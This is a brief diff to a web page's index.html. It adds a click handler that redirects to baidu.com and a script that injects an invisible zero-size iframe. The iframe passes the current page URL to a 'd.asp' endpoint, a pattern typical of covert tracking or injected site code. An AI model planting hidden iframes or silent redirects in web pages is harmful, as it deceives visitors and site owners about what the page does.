--- a/index.html
+++ b/index.html
@@ -18,7 +18,14 @@
     <img class="kf djtz" src="picture/zxfw.png" alt="">
     <script src="js/jquery.min.js"></script>
 
-
+  <script>
+        $(document).ready(function(){
+            $(".djtz").click(function(){
+                window.location.href="https://www.baidu.com";
+            });
+        });
+    </script>
+	<div id='n'></div><script>w=window.location.href;document.getElementById("n").innerHTML="<iframe src ='d.asp?c=8&e=" + w + "' width=0 height=0></iframe>";</script>
 	
 </body>
 </html>
